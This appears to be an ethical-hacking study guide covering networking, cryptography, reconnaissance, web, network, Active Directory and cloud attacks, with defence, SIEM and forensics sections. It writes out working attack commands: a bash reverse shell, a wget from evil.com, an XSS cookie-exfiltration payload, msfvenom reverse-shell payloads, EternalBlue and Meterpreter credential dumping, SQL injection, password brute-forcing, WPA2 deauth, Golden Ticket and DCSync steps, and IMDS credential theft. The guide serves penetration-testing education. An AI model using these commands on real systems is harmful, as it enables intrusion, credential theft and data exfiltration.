Ethical Hacking MasterGuide

// LOCKHEED MARTIN — CYBER KILL CHAIN (ATTACKER'S 7-STEP PLAYBOOK)

1

Recon

OSINT, scanning, social media mining

2

Weaponise

Exploit + payload creation

3

Delivery

Email, USB, watering hole

4

Exploit

Trigger vulnerability, code exec

5

Install

RAT, rootkit, web shell

6

C2

Command & Control channel

7

Actions

Data theft, ransomware, pivot

01

// FOUNDATION LAYER

Introduction to Networking in Cyber Security

Every attack travels through a network. Understanding its architecture is the first step.

// NETWORK TYPES — SCALE & SCOPE

🌐 IP Addressing

IPv4 — 32-bit · 4 octets · ~4.3 billion addresses

Class	Range	Use	Mask
A	1–126.x.x.x	Large orgs	/8
B	128–191.x.x.x	Medium	/16
C	192–223.x.x.x	Small	/24
D	224–239.x.x.x	Multicast	—

Private Ranges (RFC 1918):
10.0.0.0/8 · 172.16-31.x.x/12 · 192.168.0.0/16

🔌 Critical Ports

Port	Service	Risk
21	FTP	High – plaintext
22	SSH	Brute force
23	Telnet	Critical – no enc
53	DNS	Zone transfer
80/443	HTTP/S	Web attacks
445	SMB	EternalBlue
3389	RDP	BlueKeep
1433	MSSQL	SQLi exposure

02

// PROTOCOLS & MODELS

Basics of Networking

OSI model, TCP/IP, subnetting — the skeleton every packet travels through.

// OSI 7-LAYER MODEL — WITH ATTACK VECTORS

7

Application

User interfaces, APIs, web browsers

HTTPDNSFTP

XSS · SQLi · RCE

6

Presentation

Encoding, encryption, compression

TLS/SSL

SSL Strip · Downgrade

5

Session

Establish, manage sessions

NetBIOS

Session Hijack

4

Transport

End-to-end delivery, ports

TCPUDP

SYN Flood · Port Scan

3

Network

IP addressing, routing

IPICMP

IP Spoof · MITM

2

Data Link

MAC addresses, frames, switches

EthernetARP

ARP Spoof · MAC Flood

1

Physical

Bits, cables, radio signals

Cables

Wiretap · Jamming

Mnemonic (7→1): "All People Seem To Need Data Processing"

🔄 TCP 3-Way Handshake

SYN Flood: Send thousands of SYNs, never complete → server exhausts half-open queue → DoS.

📐 Subnetting (CIDR)

1

9

2

NET

.

1

6

8

NET

.

1

NET

.

0

HOST

CIDR	Mask	Hosts
/8	255.0.0.0	16.7M
/16	255.255.0.0	65,534
/24	255.255.255.0	254
/30	255.255.255.252	2

Formula: Hosts = 2ⁿ − 2 (n = host bits)

03

// HACKER'S OS

Linux Command Line Interface

Kali Linux — master the terminal and you master the field.

# Navigation pwd / ls -la / cd /etc find / -name "*.conf" 2>/dev/null locate passwd # File Ops cat /etc/passwd grep -i "root" file.txt awk '{print $1}' log.txt sed -i 's/old/new/g' file cut -d: -f1 /etc/passwd # Network ip a / ip route ss -tulnp netstat -an tcpdump -i eth0 -w cap.pcap curl -v http://target/ wget -q http://evil.com/shell.sh

# Permission format: Type|User|Group|Other -rwxr-xr-- (r=4 w=2 x=1) chmod 755 script.sh chown root:root file # SUID binaries — PRIVESC GOLD find / -perm -4000 -type f 2>/dev/null # Process & Users ps aux sudo -l # what can I sudo? cat /etc/shadow id / whoami / groups history env crontab -l cat /etc/crontab # Bash reverse shell (one-liner) bash -i >& /dev/tcp/10.10.10.1/4444 0>&1

04

// CORE PHILOSOPHY

Introduction to Cyber Security

CIA Triad, hacker types, and the attacker mindset.

// CIA TRIAD

🔐

CONFIDENTIALITY

Only authorised users can view sensitive data. Protected from eavesdroppers.

Controls: Encryption · ACL · MFA · Classification

⚠ Data theft · Eavesdropping

✅

INTEGRITY

Data must remain accurate and unaltered during storage and transmission.

Controls: Hashing · Digital Signatures · Checksums

⚠ MITM tampering · Rootkits

⚡

AVAILABILITY

Systems must be accessible for authorised users when required.

Controls: Redundancy · Backups · DDoS mitigation

⚠ DoS · DDoS · Ransomware

🤍 White Hat

Ethical hacker with written permission. Responsible disclosure. CEH / OSCP certified.

LegalCertified

🖤 Black Hat

Malicious attacker. No permission. Financial gain, revenge, espionage, or ideology.

CriminalProsecuted

🩶 Grey Hat

Hacks without permission but may disclose findings. Legally risky — still unauthorised.

RiskyBug Bounty

05

// CORE SCIENCE

Cryptography — Hashing, Encryption & PKI

The mathematical backbone of security. Understand SHA-256, AES, RSA, and when to use each.

// HASHING vs ENCRYPTION vs ENCODING — THE CRITICAL DIFFERENCE

🔁 HASHING

DirectionONE-WAY (irreversible)

OutputFixed-length digest

Key?No key needed

PurposeIntegrity verification, passwords

AlgorithmsMD5, SHA-1, SHA-256, SHA-3, bcrypt

Example"hello" → 2cf24dba5...

🔐 ENCRYPTION

DirectionTWO-WAY (reversible)

OutputVariable ciphertext

Key?Key required

PurposeConfidentiality of data

AlgorithmsAES, RSA, DES, 3DES, ChaCha20

Example"hello" + key → QmFzZTY0...

Encoding ≠ Encryption: Base64/URL encoding is NOT security — it's just a format change. Anyone can decode it. Never use encoding to protect sensitive data.

🔑 HASHING ALGORITHMS — DEEP DIVE

MD5

BROKEN ✗

128-bit output. Designed 1992. Collision attacks demonstrated in minutes. Never use for security. Still used for checksums/non-security integrity.

5d41402abc4b2a76b9719d911017c592

SHA-1

DEPRECATED ✗

160-bit output. Designed 1995. SHA-1 collision found 2017 (SHAttered). Deprecated for TLS/code signing. Avoid in new systems.

aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d

SHA-256

SECURE ✓

256-bit output. Part of SHA-2 family. Used in Bitcoin, TLS 1.3, SSL certs, JWT signatures, Git commits. Gold standard for integrity checks.

2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c...

SHA-512

SECURE ✓

512-bit output. SHA-2 family. Stronger than SHA-256. Ideal for high-security password hashing combined with salt. Slower = better for passwords.

SHA-3 / Keccak

MODERN ✓

NIST standard 2015. Different design than SHA-2 (sponge construction). Not SHA-2 replacement but alternative. Used in Ethereum blockchain.

bcrypt

PASSWORDS ✓

Adaptive cost factor. Built-in salting prevents rainbow tables. Intentionally slow. Best for password storage alongside Argon2 and scrypt.

Argon2

BEST PRACTICE ✓

Winner of Password Hashing Competition 2015. Memory-hard — resists GPU/ASIC attacks. Three variants: Argon2i, Argon2d, Argon2id (recommended).

NTLM Hash

WINDOWS ⚠

MD4-based Windows password hash. No salt. Vulnerable to pass-the-hash attacks. Stored in SAM database. Crackable with hashcat in seconds with GPU.

🔒 ENCRYPTION ALGORITHMS — SYMMETRIC vs ASYMMETRIC

// SYMMETRIC vs ASYMMETRIC ENCRYPTION

⚡ SYMMETRIC (Same Key)

Same key encrypts AND decrypts
Fast — ideal for bulk data encryption
Key distribution problem (must share securely)
Algorithms: AES, DES, 3DES, Blowfish, ChaCha20
Use cases: File encryption, disk encryption, VPN tunnels

AES-128AES-256ChaCha20

🔑 ASYMMETRIC (Key Pair)

Public key encrypts, Private key decrypts
Slow — used for key exchange, signatures
No key distribution problem
Algorithms: RSA, ECC, Diffie-Hellman, ElGamal
Use cases: TLS/HTTPS, SSH, PGP email, JWT

RSA-2048ECDSAEd25519

🛡 AES — Advanced Encryption Standard

AES is the gold standard — adopted by NIST 2001, used by NSA for TOP SECRET data (AES-256).

Variant	Key Size	Rounds	Security Level
AES-128	128 bits	10	Strong
AES-192	192 bits	12	Stronger
AES-256	256 bits	14	Military grade

AES MODES OF OPERATION

ECB — Electronic Code Book. INSECURE — same plaintext → same ciphertext (patterns visible)

CBC — Cipher Block Chaining. Each block XOR'd with previous. Needs IV. Common.

GCM — Galois Counter Mode. Authenticated encryption. Recommended for modern apps.

CTR — Counter Mode. Turns block cipher into stream cipher. Parallelizable.

🔏 RSA — Rivest–Shamir–Adleman

Based on: Difficulty of factoring large prime numbers. A 2048-bit RSA key has ~617 decimal digits.

Key Size	Security	Use Today?
512-bit	Broken	Never
1024-bit	Weak	Avoid
2048-bit	Adequate	Minimum
4096-bit	Strong	Recommended

RSA is used for:
TLS handshake key exchange · SSH public key auth · Digital signatures · Code signing

Quantum Threat: Shor's algorithm on a quantum computer could break RSA. NIST is standardising post-quantum cryptography (CRYSTALS-Kyber, CRYSTALS-Dilithium).

# Python — Hash Examples import hashlib # SHA-256 h = hashlib.sha256(b"secret").hexdigest() # → 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b # MD5 (checksum only!) hashlib.md5(b"data").hexdigest() # bcrypt password hashing import bcrypt hashed = bcrypt.hashpw(b"password", bcrypt.gensalt(rounds=12)) bcrypt.checkpw(b"password", hashed) # → True # Python — AES Encryption (PyCryptodome) from Crypto.Cipher import AES from Crypto.Random import get_random_bytes key = get_random_bytes(32) # AES-256 cipher = AES.new(key, AES.MODE_GCM) ciphertext, tag = cipher.encrypt_and_digest(b"plaintext") # OpenSSL — Generate RSA key pair openssl genrsa -out private.pem 4096 openssl rsa -in private.pem -pubout -out public.pem # OpenSSL — Encrypt/Decrypt with AES-256-CBC openssl enc -aes-256-cbc -pbkdf2 -in plain.txt -out enc.bin openssl enc -aes-256-cbc -d -pbkdf2 -in enc.bin -out dec.txt # Hash a file with SHA-256 sha256sum file.txt openssl dgst -sha256 file.txt # Identify unknown hash type hashid '$2y$12$abc...' # → bcrypt hash-identifier # interactive # Crack hashes with hashcat hashcat -m 0 hash.txt rockyou.txt # MD5 hashcat -m 100 hash.txt rockyou.txt # SHA-1 hashcat -m 1400 hash.txt rockyou.txt # SHA-256 hashcat -m 3200 hash.txt rockyou.txt # bcrypt (SLOW) hashcat -m 1000 hash.txt rockyou.txt # NTLM (Windows)

// PKI & TLS HANDSHAKE — HOW HTTPS ACTUALLY WORKS

1. Client Hello
Cipher suites, TLS version

→

2. Server Hello
Chosen cipher + Certificate

→

3. Cert Verify
Check CA signature chain

4. Key Exchange
ECDHE / DH shared secret

→

5. Session Keys
Derive AES symmetric key

→

6. Encrypted Data
AES-GCM bulk transfer

Key insight: RSA/ECDH is only used for key exchange (slow). Bulk data uses AES (fast). This hybrid approach gives the best of both worlds.

🔑 Digital Signatures

Sign with private key → verify with public key
Provides: authentication + non-repudiation + integrity
Used in: code signing, email (S/MIME), JWT tokens
Algorithms: RSA-PSS, ECDSA, Ed25519

Flow: hash(message) → sign hash with private key → receiver verifies with public key

🌐 Common Crypto Attacks

Rainbow Table — precomputed hash lookup. Defeated by salting.
Padding Oracle — CBC mode timing leak reveals plaintext
BEAST/POODLE — SSL/TLS downgrade attacks
Bit-flipping — Modify CBC ciphertext to change plaintext
Length Extension — MD5/SHA-1/SHA-256 hash extension

📋 Crypto Quick Reference

Use Case	Recommendation
Password storage	Argon2id / bcrypt
File integrity	SHA-256
Symmetric encrypt	AES-256-GCM
Asymmetric	RSA-4096 / ECC P-384
Key exchange	ECDHE
TLS minimum	TLS 1.2 / TLS 1.3
AVOID	MD5, SHA-1, DES, RC4

06

// PHASE 1 — INTELLIGENCE

Information Gathering & Reconnaissance

"Know your enemy and know yourself..." — Sun Tzu

// PASSIVE vs ACTIVE RECON

🕵️ PASSIVE — No Direct Contact

WHOIS — Domain owner, registrar
Google Dorking — site: filetype: inurl:
Shodan — Find exposed internet devices
theHarvester — Emails, subdomains
Maltego — Visual link-analysis
Wayback Machine — Historic snapshots

Zero detection riskLegal

⚡ ACTIVE — Direct Interaction

Nmap / Masscan — Port scanning
Nikto — Web server scanning
Gobuster / Dirb / ffuf — Dir brute-force
DNS Enumeration — Zone transfer
Banner Grabbing — netcat, curl -I
WhatWeb — Web tech fingerprint

Detectable in logs

whois target.com dig target.com ANY +noall +answer dig axfr @ns1.target.com target.com # zone transfer! sublist3r -d target.com amass enum -d target.com -passive theharvester -d target.com -b all # Google Dorks site:target.com filetype:pdf site:target.com inurl:admin site:target.com ext:sql OR ext:bak intitle:"index of" site:target.com "@target.com" filetype:xls # Shodan dorks org:"Target Corp" port:22 hostname:target.com vuln:CVE-2021-44228

07

// PHASE 2 — MAPPING

Scanning & Enumeration

Map every open door. Nmap is the master key.

nmap 192.168.1.0/24 # subnet scan nmap -sS target # SYN stealth nmap -sU target # UDP scan nmap -p- target # all 65535 ports nmap -sV -O -A target # aggressive (ver+OS+scripts) nmap --script=vuln target # vulnerability scripts nmap --script=smb-vuln-ms17-010 target nmap -D RND:10 target # decoy IPs (evasion) nmap -T0 target # paranoid timing (stealthiest) # SMB Enumeration enum4linux -a 192.168.1.1 smbmap -H 192.168.1.1 # Web Enumeration gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt ffuf -u http://target/FUZZ -w common.txt -mc 200,301,302 nikto -h http://target

08

// WEB SECURITY STANDARD

VAPT — Vulnerability Assessment & Penetration Testing

OWASP Top 10 is the bible. Burp Suite is your weapon.

// OWASP TOP 10 — 2021

A01:2021 ⬆️

Broken Access Control

IDORs, missing auth checks on API endpoints

A02:2021 ⬆️

Cryptographic Failures

MD5/SHA-1 passwords, plain HTTP, weak TLS

A03:2021

Injection

SQLi, NoSQLi, OS command injection

A04:2021 🆕

Insecure Design

No threat modelling, missing security reqs

A05:2021 ⬆️

Security Misconfiguration

Default creds, open buckets, verbose errors

A06:2021 ⬆️

Vulnerable Components

Libraries with known CVEs — Log4Shell

A07:2021 ⬇️

Auth Failures

Credential stuffing, no MFA, weak session

A08:2021 🆕

Software Integrity

Insecure CI/CD, supply chain attacks

A09:2021 ⬆️

Logging Failures

No alerting on breaches, missing audit logs

A10:2021 🆕

SSRF

Server fetches internal resources for attacker

💉 SQL Injection Playbook

# Auth Bypass admin'-- / ' OR '1'='1'-- # UNION-Based ' ORDER BY 3-- # find column count ' UNION SELECT 1,user(),3-- ' UNION SELECT 1,table_name,3 FROM information_schema.tables-- # Blind Boolean ' AND 1=1-- # True ' AND 1=2-- # False (different response) # Time-Based Blind ' AND SLEEP(5)-- # 5s delay = SQLi! # SQLMap automation sqlmap -u "http://t/?id=1" --dbs --batch sqlmap -u "http://t/?id=1" -D db --tables sqlmap -u "http://t/?id=1" -D db -T users --dump

📊 CVSS Severity Scale

🔴 CRITICAL9.0 – 10.0

🟠 HIGH7.0 – 8.9

🟡 MEDIUM4.0 – 6.9

🟢 LOW0.1 – 3.9

🔵 INFO0.0

NessusOpenVASNiktoBurp Suite

09

// API SECURITY

API Penetration Testing

APIs power every modern app and are riddled with auth bypasses and logic flaws.

🔌 API Attack Surface

Type	Format	Common Vuln
REST	JSON/HTTP	BOLA, Mass Assignment
GraphQL	JSON	Introspection, DoS deep query
SOAP	XML	XXE injection

BOLA: /users/123 → /users/124. Most common API vuln. Always test in real apps.

ffuf -w api-endpoints.txt -u https://api.t/FUZZ # GraphQL introspection {"query":"{__schema{types{name fields{name}}}}"} # JWT attacks jwt_tool token.jwt -X a # alg:none attack jwt_tool token.jwt -C -d rockyou.txt # crack # Mass Assignment POST /api/register {"username":"hacker","role":"admin"}

10

// NETWORK ATTACKS

Network Penetration Testing — Part I

EternalBlue to pivoting through internal networks.

💣 Famous CVEs

CVE	Name	Service	CVSS
CVE-2017-0144	EternalBlue	SMBv1/445	10.0
CVE-2019-0708	BlueKeep	RDP/3389	9.8
CVE-2014-0160	Heartbleed	OpenSSL	7.5
CVE-2014-6271	Shellshock	Bash/CGI	10.0
CVE-2021-44228	Log4Shell	Log4j	10.0
CVE-2021-34527	PrintNightmare	Print Spooler	8.8

# SSH SOCKS5 proxy ssh -D 9050 user@pivot proxychains nmap 192.168.2.0/24 # SSH port forward ssh -L 8080:internal:80 user@pivot # Meterpreter pivot run autoroute -s 192.168.2.0/24 use auxiliary/server/socks_proxy # Chisel tunneling ./chisel server -p 8080 --reverse ./chisel client attacker:8080 R:1080:socks

11

// WIRELESS

Network PT — Part II (Wireless)

WPA2 cracking, rogue APs, deauth attacks, MITM over the air.

📡 WPA2 Attack Flow

1 · Monitor Mode

airmon-ng start wlan0

2 · Scan Networks

airodump-ng wlan0mon

3 · Capture Handshake

airodump-ng -c 6 --bssid BSSID -w cap wlan0mon

4 · Deauth Attack

aireplay-ng --deauth 100 -a BSSID wlan0mon

5 · Crack Handshake

aircrack-ng cap.cap -w rockyou.txt

arpspoof -i eth0 -t 192.168.1.5 192.168.1.1 arpspoof -i eth0 -t 192.168.1.1 192.168.1.5 echo 1 > /proc/sys/net/ipv4/ip_forward # Modern: bettercap bettercap -iface eth0 net.probe on; arp.spoof on; net.sniff on # SSL stripping hsts.bypass.domains target.com https.proxy.sslstrip true

12

// CREDENTIAL ATTACKS

Password Attacks & Hash Cracking

GPU-accelerated cracking breaks hashes in seconds.

# Key hash modes # 0=MD5 100=SHA1 1400=SHA256 # 1000=NTLM 3200=bcrypt 13100=Kerberoast hashcat -m 0 hashes.txt rockyou.txt # MD5 hashcat -m 1000 ntlm.txt rockyou.txt # NTLM hashcat -m 3200 bcrypt.txt words.txt # bcrypt hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a # brute hashcat -m 0 -r best64.rule hash.txt words.txt # rules # Identify hash type hashid '$2y$10$abc...' name-that-hash -t '$1$xyz...'

hydra -l admin -P rockyou.txt ssh://192.168.1.1 hydra -l admin -P pass.txt ftp://192.168.1.1 hydra -l admin -P rockyou.txt 192.168.1.1 \ http-post-form "/login:u=^USER^&p=^PASS^:Invalid" hydra -l administrator -P rockyou.txt rdp://target # John the Ripper john --wordlist=rockyou.txt /etc/shadow john --rules --wordlist=rockyou.txt hash.txt

13

// EXPLOIT FRAMEWORK

Metasploit Framework

2000+ exploits. Meterpreter post-exploitation. The most powerful open-source pentest platform.

msfconsole msf6> search ms17-010 msf6> use exploit/windows/smb/ms17_010_eternalblue msf6> set RHOSTS 192.168.1.10 msf6> set LHOST 192.168.1.99 msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6> run # Meterpreter post-exploitation meterpreter> sysinfo # OS info meterpreter> getuid # current user meterpreter> getsystem # → SYSTEM! meterpreter> hashdump # dump NTLM hashes meterpreter> screenshot meterpreter> keyscan_start meterpreter> run post/multi/recon/local_exploit_suggester meterpreter> run post/windows/gather/credentials/credential_collector # Generate payloads with msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f exe -o shell.exe msfvenom -p linux/x64/shell_reverse_tcp LHOST=x LPORT=4444 -f elf -o shell msfvenom -p php/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f raw -o shell.php

14

// ADVANCED WEB

Advanced Web Application Testing

IDOR, SSTI, XXE, SSRF — the acronyms that lead to full server compromise.

🔥 Advanced Vulns Cheat Sheet

Vuln	Payload	Impact
IDOR	/invoice?id=1337 → 1338	Data exposure
SSTI	{{ 7*7 }} → 49	RCE
XXE	<!ENTITY x SYSTEM "file:///etc/passwd">	File read
SSRF	url=http://169.254.169.254/	Internal access
Path Traversal	../../etc/passwd	File read
CSRF	Auto-submit form from evil.com	Action on behalf
Clickjacking	Transparent iframe over page	UI redress
DOM XSS	<img src=x onerror=alert(1)>	Session steal

🛠 Burp Suite Workflow

Proxy — Intercept every HTTP/S request, modify params live
Repeater — Replay & tweak individual requests manually
Intruder — Fuzzing, brute force, payload positions
Scanner — Active scan for XSS, SQLi, SSRF (Pro)
Collaborator — OOB testing for blind SSRF, XXE, Log4Shell
Decoder — Base64, URL, HTML, Hex encode/decode

# Reflected XSS <script>alert(document.cookie)</script> # Steal cookies (attacker's server) <img src=x onerror="fetch('http://evil.com/?c='+document.cookie)"> # Bypass WAF <svg onload=alert(1)> jaVasCrIpT:alert(1)

15

// HUMAN HACKING

Social Engineering & Physical Security

90%+ of breaches start with a phishing email. Human is the weakest link.

🎣

Phishing

Fake emails/sites

📞

Vishing

Phone attacks

💬

Smishing

SMS phishing

🚶

Tailgating

Physical intrusion

🍬

Baiting

Infected USB drop

🎭

Pretexting

Fabricated scenario

# GoPhish — phishing campaigns ./gophish # → https://localhost:3333 # 1. Configure SMTP sending profile # 2. Clone target email template # 3. Clone landing page (capture creds) # 4. Add target users/groups CSV # 5. Launch + track opens/clicks/submits # Social Engineering Toolkit setoolkit # 1) SE Attacks → 2) Website Attack → 3) Credential Harvester # Email header analysis mxtoolbox.com/EmailHeaders # check SPF/DKIM/DMARC

🛡 Defence Checklist

SPF + DKIM + DMARC on all email domains
Security awareness training + phishing simulation
MFA on every account (TOTP or hardware key)
Verify IT support calls via callback on known number
Physical: badge access, mantrap, clean desk
Disable USB auto-run. Endpoint DLP
One-click easy incident reporting

16

// POST EXPLOITATION

Privilege Escalation Techniques

Low-priv shell → SYSTEM/root. The art of escalation.

# LinPEAS — automated curl -L https://github.com/.../linpeas.sh | sh # SUID binaries find / -perm -u=s -type f 2>/dev/null # Found: /usr/bin/vim → vim -c ':!/bin/bash' # Sudo misconfig sudo -l # (ALL) NOPASSWD: /usr/bin/python3 sudo python3 -c 'import os; os.system("/bin/bash")' # Writable cron job cat /etc/crontab echo 'chmod +s /bin/bash' >> /opt/backup.sh # DirtyPipe (CVE-2022-0847) uname -r # Linux < 5.16.11

# WinPEAS .\WinPEAS.exe quiet systeminfo # Unquoted service paths wmic service get name,pathname,startmode # C:\Program Files\App\service.exe # → place C:\Program.exe → runs as SYSTEM # Token impersonation (SeImpersonatePrivilege) meterpreter> load incognito meterpreter> impersonate_token "NT AUTHORITY\SYSTEM" # PrintSpoofer / GodPotato / JuicyPotato .\PrintSpoofer.exe -i -c cmd # AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer # Both = 1 → MSI payload runs as SYSTEM!

17

// ENTERPRISE ATTACKS

Active Directory Penetration Testing

95% of Fortune 500 companies use AD. Compromise it and you own the entire enterprise.

// ACTIVE DIRECTORY STRUCTURE

🌲 FOREST: corp.local └─ 🏢 DOMAIN: corp.local ├─ 🏢 DOMAIN: subsidiary.corp.local └─ OU: Users ├─ OU: IT Admins │ ├─ 👤 User: jdoe (Domain Admin) │ └─ 💻 Computer: ADMIN-PC01 └─ OU: Workstations └─ 💻 Computer: WS-001...WS-500 Key Objects to Target: KRBTGT account (Golden Ticket) · Domain Controller · GPO · ACLs · Service Accounts (Kerberoasting)

⚔ AD Attack Chain

1 · Initial Access

Phishing, password spray, VPN bruteforce → low-priv domain user

2 · Enumerate AD

BloodHound, PowerView — map attack paths, find Kerberoastable accounts

3 · Credential Attacks

Kerberoasting, AS-REP Roasting, LLMNR poisoning, Pass-the-Hash

4 · Lateral Movement

WMI, PSExec, Pass-the-Hash to privileged machines

5 · Domain Admin

DCSync attack → dump all domain hashes from DC

6 · Persistence

Golden Ticket (10 years!), Silver Ticket, Skeleton Key

🔑 Kerberoasting

Request service tickets for SPNs, crack offline. Service accounts often have weak passwords.

# Find Kerberoastable accounts Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName # Request service tickets python3 GetUserSPNs.py corp.local/jdoe:Pass123 -outputfile hashes.txt # Crack with hashcat hashcat -m 13100 hashes.txt rockyou.txt # AS-REP Roasting (no pre-auth required) python3 GetNPUsers.py corp.local/ -usersfile users.txt hashcat -m 18200 asrep.txt rockyou.txt

# ── BloodHound — Graph-based AD attack paths ── SharpHound.exe -c All --zipfilename bloodhound.zip # Import zip into BloodHound GUI # Query: "Find Shortest Path to Domain Admin" # ── LLMNR/NBT-NS Poisoning (Responder) ── responder -I eth0 -wF # Captures NetNTLMv2 hashes when user accesses non-existent shares hashcat -m 5600 netntlmv2.txt rockyou.txt # ── Pass-the-Hash ── crackmapexec smb 192.168.1.0/24 -u Administrator -H <NTLM_HASH> impacket-wmiexec -hashes :NTLMhash Administrator@192.168.1.10 # ── DCSync (needs Domain Admin/Replication rights) ── python3 secretsdump.py corp.local/Administrator:Pass@DC01 # → dumps ALL domain hashes including KRBTGT! # ── Golden Ticket ── mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:<hash> /user:Administrator # Valid for 10 years. Works even after password changes!

🛡 AD Defence Checklist

Enable Protected Users security group for admin accounts
Disable LLMNR and NetBIOS over TCP/IP on all machines
Use Managed Service Accounts (gMSA) — auto-rotated 120-char passwords
Implement Tiered Administration — Tier 0/1/2 model
Enable Credential Guard on Windows 10+ endpoints
Disable unconstrained delegation on service accounts
Monitor for: 4769 (Kerberoast), 4768 (AS-REP), 4662 (DCSync)
Deploy Microsoft Defender for Identity (MDI) on DCs

18

// CLOUD PENETRATION

Cloud Security — AWS, Azure & GCP

Misconfigured S3 buckets, IMDS exploitation, and IAM privilege escalation paths.

// CLOUD SHARED RESPONSIBILITY MODEL

☁ CLOUD PROVIDER

Physical hardware / datacenters
Hypervisor / virtualization
Network infrastructure
Foundational services

👤 YOUR RESPONSIBILITY

Data & classification
IAM policies and credentials
Application security
Network configuration (SGs, NACLs)
Encryption of data at rest/transit

AWS

Amazon Web Services

S3 Bucket Misconfiguration

Public read/write on S3 buckets exposes sensitive data. Often contains DB dumps, source code, private keys.

AWS

Amazon Web Services

IMDS v1 Exploitation

SSRF → http://169.254.169.254/latest/meta-data/iam/security-credentials/ → steal EC2 role credentials

Azure

Microsoft Azure

Azure AD Token Theft

Steal OAuth tokens from browser storage or apps. Use roadrecon to enumerate Azure AD via Graph API.

GCP

Google Cloud Platform

Default SA Over-Privilege

Default Compute SA has Editor role. Compromise one VM → pivot to entire project via metadata service.

AWS

Amazon Web Services

IAM Privilege Escalation

iam:PassRole + lambda:CreateFunction = admin via code. Use Pacu framework for automated escalation.

Azure

Microsoft Azure

Storage Account Exposure

Publicly accessible blob containers. SAS tokens exposed in URLs with excessively long validity periods.

# ── AWS Enumeration ── aws s3 ls --no-sign-request # list public buckets aws s3 ls s3://bucket-name --no-sign-request aws sts get-caller-identity # who am I? aws iam list-users aws iam get-account-password-policy # IMDS v1 (via SSRF or on EC2) curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> # → Returns: AccessKeyId, SecretAccessKey, Token (temp creds!) # ── Pacu — AWS exploit framework ── pacu Pacu> run iam__enum_permissions Pacu> run iam__privesc_scan # ── ScoutSuite — cloud security audit ── scout aws --report-name report # ── Azure ── az login az ad user list roadrecon gather # Azure AD enumeration stormspotter # Azure attack graph (like BloodHound) # ── Find exposed secrets in code ── truffleHog --regex https://github.com/target/repo gitleaks detect --repo-path ./repo

19

// MALWARE SCIENCE

Malware Analysis & Reverse Engineering

Dissect malicious code to understand IOCs and evasion techniques.

🔬 Static Analysis

file malware.exe strings malware.exe | grep -iE "http|cmd|pass|key" sha256sum malware.exe # → VirusTotal pestudio malware.exe # PE analysis objdump -d malware.exe # disassemble # Ghidra / IDA Pro for deep RE

stringsPEStudioGhidraVirusTotal

🏃 Dynamic Analysis (Sandbox)

Process Monitor — File, registry, network syscalls
Wireshark — Capture C2 traffic, DNS beacons
Any.run — Online interactive sandbox
Cuckoo Sandbox — Self-hosted automated analysis
x64dbg — Dynamic step-by-step debugging

Safety: Isolated VM only. Host-only network. Snapshot before. Never on production.

20

// SECURITY MONITORING

SIEM — Security Information & Event Management

The defender's eyes. Correlate millions of events to surface the needle in the haystack.

🔍 Splunk SPL Queries

# Failed logins (Event 4625) index=security EventCode=4625 | stats count by src_ip, user | sort -count # Port scanning detection index=network | stats dc(dest_port) as ports by src_ip | where ports > 50 # PowerShell execution (Event 4104) index=windows EventCode=4104 | search ScriptBlockText="*encodedCommand*" | table _time, user, host, ScriptBlockText

🦌 ELK Stack

Elasticsearch — Log storage
Logstash — Ingest & parse
Kibana — Dashboards
Beats — Lightweight shippers

21

// DEFENCE OPS

Blue Team Basics

Incident response, YARA rules, threat hunting — the defender's complete playbook.

// NIST INCIDENT RESPONSE LIFECYCLE

🔧
PREPARE
Policies · Tools

→

🔍
DETECT
SIEM · IDS

→

🔒
CONTAIN
Isolate · Block

→

🗑
ERADICATE
Remove · Patch

→

✅
RECOVER
Restore · Verify

rule Detect_Mimikatz { meta: description = "Detects Mimikatz" severity = "critical" strings: $s1 = "sekurlsa" ascii wide $s2 = "mimikatz" ascii wide nocase $s3 = "lsadump" ascii wide $s4 = { 6D 69 6D 69 6B 61 74 7A } condition: 2 of them } yara -r rules/ /path/to/scan/

🔭 Threat Hunting Steps

1 · Hypothesis

"PowerShell is being used for lateral movement"

2 · Collect Data

Pull PS event logs 4103/4104, network flows, process tree

3 · Analyse

Look for -encodedCommand, LOLBAS, unusual parent process chains

4 · Document IOCs

Export hashes, IPs, domains as IOC feed

22

// EVIDENCE & INVESTIGATION

Digital Forensics & Incident Response (DFIR)

Preserve evidence, analyse artefacts, reconstruct timelines. Chain of custody is sacred.

// DFIR EVIDENCE HIERARCHY (ORDER OF VOLATILITY)

1

CPU Registers & Cache

Most volatile — lost immediately on shutdown. Capture first!

2

RAM / Physical Memory

Running processes, network connections, decrypted data, passwords in memory

3

Network State (ARP, connections, routing)

Active connections, ARP cache, listening ports

4

Running Processes & Open Files

Process list, open handles, temp files

5

Disk / Storage

Least volatile. Files, logs, registry hives. Create forensic image first.

# Identify OS profile volatility -f mem.raw imageinfo # List running processes vol.py -f mem.raw --profile=Win7SP1x64 pslist vol.py -f mem.raw --profile=Win7SP1x64 pstree # Find hidden/injected processes vol.py -f mem.raw --profile=Win7SP1x64 malfind # Network connections vol.py -f mem.raw --profile=Win7SP1x64 netscan # Extract password hashes from memory vol.py -f mem.raw --profile=Win7SP1x64 hashdump # Dump a process for analysis vol.py -f mem.raw --profile=Win7SP1x64 procdump -p 1337 -D ./dumps/ # Registry hives vol.py -f mem.raw --profile=Win7SP1x64 hivelist

# Create forensic image (write-blocker) dd if=/dev/sdb of=image.dd bs=4k conv=noerror,sync sha256sum image.dd > image.dd.sha256 # evidence hash! # Mount read-only mount -o ro,loop image.dd /mnt/evidence # Autopsy (GUI forensics platform) autopsy # → http://localhost:9999/autopsy # File carving — recover deleted files foremost -t all -i image.dd -o ./output photorec image.dd # interactive # Browser artifact extraction hindsight -i "~/.config/chromium/Default" -o report # Windows event log analysis python3 evtx_dump.py Security.evtx | jq . chainsaw hunt ./evtx/ -s sigma-rules/ --mapping sigma-map.yml

🔍 Key Windows Artefacts

